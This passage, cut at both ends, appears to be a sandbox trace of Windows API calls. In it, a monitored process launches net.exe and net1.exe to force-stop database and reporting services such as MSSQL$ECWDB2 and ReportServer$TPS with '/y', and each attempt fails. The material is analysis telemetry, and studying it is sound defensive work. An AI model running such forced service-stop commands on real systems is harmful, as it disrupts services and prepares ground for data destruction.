-14 [0196.831] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$TPS") returned -6 [0196.831] _wcsicmp (_String1="server", _String2="ReportServer$TPS") returned 1 [0196.831] _wcsicmp (_String1="svr", _String2="ReportServer$TPS") returned 1 [0196.831] _wcsicmp (_String1="srv", _String2="ReportServer$TPS") returned 1 [0196.831] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$TPS") returned -6 [0196.831] _wcsicmp (_String1="alerter", _String2="ReportServer$TPS") returned -17 [0196.831] _wcsicmp (_String1="netlogon", _String2="ReportServer$TPS") returned -4 [0196.831] _wcsupr (in: _String="ReportServer$TPS" | out: _String="REPORTSERVER$TPS") returned="REPORTSERVER$TPS" [0196.831] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x785460 [0196.833] GetServiceKeyNameW (in: hSCManager=0x785460, lpDisplayName="REPORTSERVER$TPS", lpServiceName=0xc8aaf0, lpcchBuffer=0x36fb6c | out: lpServiceName="", lpcchBuffer=0x36fb6c) returned 0 [0196.834] _wcsicmp (_String1="msg", _String2="REPORTSERVER$TPS") returned -5 [0196.834] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$TPS") returned -5 [0196.834] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$TPS") returned -13 [0196.834] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$TPS") returned -2 [0196.834] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$TPS") returned -12 [0196.834] _wcsicmp (_String1="redir", _String2="REPORTSERVER$TPS") returned -12 [0196.834] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$TPS") returned -1 [0196.834] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$TPS") returned 5 [0196.834] _wcsicmp (_String1="work", _String2="REPORTSERVER$TPS") returned 5 [0196.834] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$TPS") returned 5 [0196.834] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$TPS") returned -2 [0196.834] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$TPS") returned -14 [0196.834] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$TPS") returned -6 [0196.834] _wcsicmp (_String1="server", _String2="REPORTSERVER$TPS") returned 1 [0196.834] _wcsicmp (_String1="svr", _String2="REPORTSERVER$TPS") returned 1 [0196.834] _wcsicmp (_String1="srv", _String2="REPORTSERVER$TPS") returned 1 [0196.834] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$TPS") returned -6 [0196.834] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$TPS") returned -17 [0196.834] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$TPS") returned -4 [0196.834] NetServiceControl (in: servername=0x0, service="REPORTSERVER$TPS", opcode=0x0, arg=0x0, bufptr=0x36fb68 | out: bufptr=0x36fb68) returned 0x889 [0196.835] wcscpy_s (in: _Destination=0xc8a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0196.835] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0196.836] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc8b338, nSize=0x800, Arguments=0xc89dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0196.838] GetFileType (hFile=0x26c) returned 0x3 [0196.838] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x783f90 [0196.838] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x783f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0196.838] WriteFile (in: hFile=0x26c, lpBuffer=0x783f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36faa8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36faa8, lpOverlapped=0x0) returned 0 [0196.838] LocalFree (hMem=0x783f90) returned 0x0 [0196.838] GetFileType (hFile=0x26c) returned 0x3 [0196.838] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x786238 [0196.838] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x786238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0196.838] WriteFile (in: hFile=0x26c, lpBuffer=0x786238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36faa8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36faa8, lpOverlapped=0x0) returned 0 [0196.838] LocalFree (hMem=0x786238) returned 0x0 [0196.838] _ultow (in: _Dest=0x889, _Radix=3603160 | out: _Dest=0x889) returned="2185" [0196.838] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc8b338, nSize=0x800, Arguments=0xc89dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0196.838] GetFileType (hFile=0x26c) returned 0x3 [0196.838] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x786238 [0196.838] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x786238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0196.838] WriteFile (in: hFile=0x26c, lpBuffer=0x786238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36fab4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fab4, lpOverlapped=0x0) returned 0 [0196.838] LocalFree (hMem=0x786238) returned 0x0 [0196.838] GetFileType (hFile=0x26c) returned 0x3 [0196.838] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x786238 [0196.838] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x786238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0196.838] WriteFile (in: hFile=0x26c, lpBuffer=0x786238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fab4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fab4, lpOverlapped=0x0) returned 0 [0196.838] LocalFree (hMem=0x786238) returned 0x0 [0196.839] NetApiBufferFree (Buffer=0x781c78) returned 0x0 [0196.839] NetApiBufferFree (Buffer=0x781c90) returned 0x0 [0196.839] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" [0196.839] exit (_Code=2) Process: id = "128" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x63504000" os_pid = "0x95c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 301 os_tid = 0x9ec Process: id = "129" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51b12000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "128" os_parent_pid = "0x95c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 302 os_tid = 0x978 [0197.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefeb8 | out: lpSystemTimeAsFileTime=0xefeb8*(dwLowDateTime=0x3e9fdf00, dwHighDateTime=0x1d57a87)) [0197.016] GetCurrentProcessId () returned 0x9f4 [0197.016] GetCurrentThreadId () returned 0x978 [0197.016] GetTickCount () returned 0x116aeb7 [0197.016] QueryPerformanceCounter (in: lpPerformanceCount=0xefeb0 | out: lpPerformanceCount=0xefeb0*=31730047190) returned 1 [0197.016] GetModuleHandleA (lpModuleName=0x0) returned 0xa60000 [0197.016] __set_app_type (_Type=0x1) [0197.016] __p__fmode () returned 0x74eb31f4 [0197.016] __p__commode () returned 0x74eb31fc [0197.016] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa6ffe6) returned 0x0 [0197.017] __getmainargs (in: _Argc=0xa79064, _Argv=0xa7906c, _Env=0xa79068, _DoWildCard=0, _StartInfo=0xa79024 | out: _Argc=0xa79064, _Argv=0xa7906c, _Env=0xa79068) returned 0 [0197.017] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.017] GetConsoleOutputCP () returned 0x1b5 [0197.017] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa79080 | out: lpCPInfo=0xa79080) returned 1 [0197.017] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.020] sprintf_s (in: _DstBuf=0xefe70, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0197.020] setlocale (category=0, locale=".437") returned="English_United States.437" [0197.022] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0197.022] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0197.022] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$ECWDB2 /y" [0197.022] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefc3c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0197.022] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6c) returned 0x5f3c10 [0197.022] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0197.022] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefe40 | out: Buffer=0xefe40*=0x5f1c70) returned 0x0 [0197.022] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefe40 | out: Buffer=0xefe40*=0x5f1c88) returned 0x0 [0197.022] _fileno (_File=0x74eb2900) returned -2 [0197.022] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0197.023] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0197.023] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0197.023] _wcsicmp (_String1="config", _String2="stop") returned -16 [0197.023] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0197.023] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0197.023] _wcsicmp (_String1="file", _String2="stop") returned -13 [0197.023] _wcsicmp (_String1="files", _String2="stop") returned -13 [0197.023] _wcsicmp (_String1="group", _String2="stop") returned -12 [0197.023] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0197.023] _wcsicmp (_String1="help", _String2="stop") returned -11 [0197.023] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0197.023] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0197.023] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0197.023] _wcsicmp (_String1="session", _String2="stop") returned -15 [0197.023] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0197.023] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0197.023] _wcsicmp (_String1="share", _String2="stop") returned -12 [0197.023] _wcsicmp (_String1="start", _String2="stop") returned -14 [0197.023] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0197.023] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0197.023] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0197.023] _wcsicmp (_String1="accounts", _String2="MSSQL$ECWDB2") returned -12 [0197.023] _wcsicmp (_String1="computer", _String2="MSSQL$ECWDB2") returned -10 [0197.023] _wcsicmp (_String1="config", _String2="MSSQL$ECWDB2") returned -10 [0197.023] _wcsicmp (_String1="continue", _String2="MSSQL$ECWDB2") returned -10 [0197.023] _wcsicmp (_String1="cont", _String2="MSSQL$ECWDB2") returned -10 [0197.023] _wcsicmp (_String1="file", _String2="MSSQL$ECWDB2") returned -7 [0197.023] _wcsicmp (_String1="files", _String2="MSSQL$ECWDB2") returned -7 [0197.023] _wcsicmp (_String1="group", _String2="MSSQL$ECWDB2") returned -6 [0197.023] _wcsicmp (_String1="groups", _String2="MSSQL$ECWDB2") returned -6 [0197.023] _wcsicmp (_String1="help", _String2="MSSQL$ECWDB2") returned -5 [0197.023] _wcsicmp (_String1="helpmsg", _String2="MSSQL$ECWDB2") returned -5 [0197.023] _wcsicmp (_String1="localgroup", _String2="MSSQL$ECWDB2") returned -1 [0197.023] _wcsicmp (_String1="pause", _String2="MSSQL$ECWDB2") returned 3 [0197.023] _wcsicmp (_String1="session", _String2="MSSQL$ECWDB2") returned 6 [0197.023] _wcsicmp (_String1="sessions", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="sess", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="share", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="start", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="stats", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="statistics", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="stop", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="time", _String2="MSSQL$ECWDB2") returned 7 [0197.024] _wcsicmp (_String1="user", _String2="MSSQL$ECWDB2") returned 8 [0197.024] _wcsicmp (_String1="users", _String2="MSSQL$ECWDB2") returned 8 [0197.024] _wcsicmp (_String1="msg", _String2="MSSQL$ECWDB2") returned -12 [0197.024] _wcsicmp (_String1="messenger", _String2="MSSQL$ECWDB2") returned -14 [0197.024] _wcsicmp (_String1="receiver", _String2="MSSQL$ECWDB2") returned 5 [0197.024] _wcsicmp (_String1="rcv", _String2="MSSQL$ECWDB2") returned 5 [0197.024] _wcsicmp (_String1="netpopup", _String2="MSSQL$ECWDB2") returned 1 [0197.024] _wcsicmp (_String1="redirector", _String2="MSSQL$ECWDB2") returned 5 [0197.024] _wcsicmp (_String1="redir", _String2="MSSQL$ECWDB2") returned 5 [0197.024] _wcsicmp (_String1="rdr", _String2="MSSQL$ECWDB2") returned 5 [0197.024] _wcsicmp (_String1="workstation", _String2="MSSQL$ECWDB2") returned 10 [0197.024] _wcsicmp (_String1="work", _String2="MSSQL$ECWDB2") returned 10 [0197.024] _wcsicmp (_String1="wksta", _String2="MSSQL$ECWDB2") returned 10 [0197.024] _wcsicmp (_String1="prdr", _String2="MSSQL$ECWDB2") returned 3 [0197.024] _wcsicmp (_String1="devrdr", _String2="MSSQL$ECWDB2") returned -9 [0197.024] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$ECWDB2") returned -1 [0197.024] _wcsicmp (_String1="server", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="svr", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="srv", _String2="MSSQL$ECWDB2") returned 6 [0197.024] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$ECWDB2") returned -1 [0197.024] _wcsicmp (_String1="alerter", _String2="MSSQL$ECWDB2") returned -12 [0197.024] _wcsicmp (_String1="netlogon", _String2="MSSQL$ECWDB2") returned 1 [0197.024] _wcsupr (in: _String="MSSQL$ECWDB2" | out: _String="MSSQL$ECWDB2") returned="MSSQL$ECWDB2" [0197.025] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5f54d0 [0197.030] GetServiceKeyNameW (in: hSCManager=0x5f54d0, lpDisplayName="MSSQL$ECWDB2", lpServiceName=0xa7aaf0, lpcchBuffer=0xefddc | out: lpServiceName="", lpcchBuffer=0xefddc) returned 0 [0197.031] _wcsicmp (_String1="msg", _String2="MSSQL$ECWDB2") returned -12 [0197.031] _wcsicmp (_String1="messenger", _String2="MSSQL$ECWDB2") returned -14 [0197.031] _wcsicmp (_String1="receiver", _String2="MSSQL$ECWDB2") returned 5 [0197.031] _wcsicmp (_String1="rcv", _String2="MSSQL$ECWDB2") returned 5 [0197.031] _wcsicmp (_String1="redirector", _String2="MSSQL$ECWDB2") returned 5 [0197.031] _wcsicmp (_String1="redir", _String2="MSSQL$ECWDB2") returned 5 [0197.031] _wcsicmp (_String1="rdr", _String2="MSSQL$ECWDB2") returned 5 [0197.031] _wcsicmp (_String1="workstation", _String2="MSSQL$ECWDB2") returned 10 [0197.031] _wcsicmp (_String1="work", _String2="MSSQL$ECWDB2") returned 10 [0197.031] _wcsicmp (_String1="wksta", _String2="MSSQL$ECWDB2") returned 10 [0197.031] _wcsicmp (_String1="prdr", _String2="MSSQL$ECWDB2") returned 3 [0197.031] _wcsicmp (_String1="devrdr", _String2="MSSQL$ECWDB2") returned -9 [0197.031] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$ECWDB2") returned -1 [0197.031] _wcsicmp (_String1="server", _String2="MSSQL$ECWDB2") returned 6 [0197.031] _wcsicmp (_String1="svr", _String2="MSSQL$ECWDB2") returned 6 [0197.031] _wcsicmp (_String1="srv", _String2="MSSQL$ECWDB2") returned 6 [0197.031] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$ECWDB2") returned -1 [0197.031] _wcsicmp (_String1="alerter", _String2="MSSQL$ECWDB2") returned -12 [0197.031] _wcsicmp (_String1="netlogon", _String2="MSSQL$ECWDB2") returned 1 [0197.031] NetServiceControl (in: servername=0x0, service="MSSQL$ECWDB2", opcode=0x0, arg=0x0, bufptr=0xefdd8 | out: bufptr=0xefdd8) returned 0x889 [0197.032] wcscpy_s (in: _Destination=0xa7a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0197.032] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0197.033] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xa7b338, nSize=0x800, Arguments=0xa79dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0197.034] GetFileType (hFile=0x26c) returned 0x3 [0197.034] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5f4000 [0197.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5f4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0197.034] WriteFile (in: hFile=0x26c, lpBuffer=0x5f4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xefd18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefd18, lpOverlapped=0x0) returned 0 [0197.034] LocalFree (hMem=0x5f4000) returned 0x0 [0197.034] GetFileType (hFile=0x26c) returned 0x3 [0197.034] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5f62a8 [0197.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5f62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n_", lpUsedDefaultChar=0x0) returned 2 [0197.034] WriteFile (in: hFile=0x26c, lpBuffer=0x5f62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefd18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefd18, lpOverlapped=0x0) returned 0 [0197.034] LocalFree (hMem=0x5f62a8) returned 0x0 [0197.034] _ultow (in: _Dest=0x889, _Radix=982344 | out: _Dest=0x889) returned="2185" [0197.034] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xa7b338, nSize=0x800, Arguments=0xa79dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0197.035] GetFileType (hFile=0x26c) returned 0x3 [0197.035] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5f62a8 [0197.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5f62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0197.035] WriteFile (in: hFile=0x26c, lpBuffer=0x5f62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xefd24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefd24, lpOverlapped=0x0) returned 0 [0197.035] LocalFree (hMem=0x5f62a8) returned 0x0 [0197.035] GetFileType (hFile=0x26c) returned 0x3 [0197.035] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5f62a8 [0197.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5f62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n_", lpUsedDefaultChar=0x0) returned 2 [0197.035] WriteFile (in: hFile=0x26c, lpBuffer=0x5f62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefd24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefd24, lpOverlapped=0x0) returned 0 [0197.035] LocalFree (hMem=0x5f62a8) returned 0x0 [0197.035] NetApiBufferFree (Buffer=0x5f1c70) returned 0x0 [0197.036] NetApiBufferFree (Buffer=0x5f1c88) returned 0x0 [0197.036] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$ECWDB2 /y" [0197.036] exit (_Code=2) Process: id = "130" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5130e000" os_pid = "0x89c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SntpService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 303 os_tid = 0x8a4 Process: id = "131" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x55db3000" os_pid = "0x8a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "130" os_parent_pid = "0x89c" cmd_line = "C:\\Windows\\system32\\net1 stop SntpService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 304 os_tid = 0xa00 [0197.165] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xeff60 | out: lpSystemTimeAsFileTime=0xeff60*(dwLowDateTime=0x3eb54b60, dwHighDateTime=0x1d57a87)) [0197.165] GetCurrentProcessId () returned 0x8a0 [0197.165] GetCurrentThreadId () returned 0xa00 [0197.165] GetTickCount () returned 0x116af43 [0197.165] QueryPerformanceCounter (in: lpPerformanceCount=0xeff58 | out: lpPerformanceCount=0xeff58*=31745000603) returned 1 [0197.166] GetModuleHandleA (lpModuleName=0x0) returned 0xd90000 [0197.166] __set_app_type (_Type=0x1) [0197.166] __p__fmode () returned 0x74eb31f4 [0197.166] __p__commode () returned 0x74eb31fc [0197.166] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd9ffe6) returned 0x0 [0197.166] __getmainargs (in: _Argc=0xda9064, _Argv=0xda906c, _Env=0xda9068, _DoWildCard=0, _StartInfo=0xda9024 | out: _Argc=0xda9064, _Argv=0xda906c, _Env=0xda9068) returned 0 [0197.166] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.166] GetConsoleOutputCP () returned 0x1b5 [0197.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xda9080 | out: lpCPInfo=0xda9080) returned 1 [0197.166] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.169] sprintf_s (in: _DstBuf=0xeff18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0197.169] setlocale (category=0, locale=".437") returned="English_United States.437" [0197.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0197.172] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0197.172] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SntpService /y" [0197.172] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefce4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0197.172] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x6a) returned 0x203c10 [0197.172] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0197.172] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefee8 | out: Buffer=0xefee8*=0x201c70) returned 0x0 [0197.172] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefee8 | out: Buffer=0xefee8*=0x201c88) returned 0x0 [0197.172] _fileno (_File=0x74eb2900) returned -2 [0197.172] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0197.172] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0197.172] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0197.172] _wcsicmp (_String1="config", _String2="stop") returned -16 [0197.172] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0197.172] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0197.172] _wcsicmp (_String1="file", _String2="stop") returned -13 [0197.172] _wcsicmp (_String1="files", _String2="stop") returned -13 [0197.172] _wcsicmp (_String1="group", _String2="stop") returned -12 [0197.173] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0197.173] _wcsicmp (_String1="help", _String2="stop") returned -11 [0197.173] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0197.173] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0197.173] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0197.173] _wcsicmp (_String1="session", _String2="stop") returned -15 [0197.173] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0197.173] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0197.173] _wcsicmp (_String1="share", _String2="stop") returned -12 [0197.173] _wcsicmp (_String1="start", _String2="stop") returned -14 [0197.173] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0197.173] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0197.173] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0197.173] _wcsicmp (_String1="accounts", _String2="SntpService") returned -18 [0197.173] _wcsicmp (_String1="computer", _String2="SntpService") returned -16 [0197.173] _wcsicmp (_String1="config", 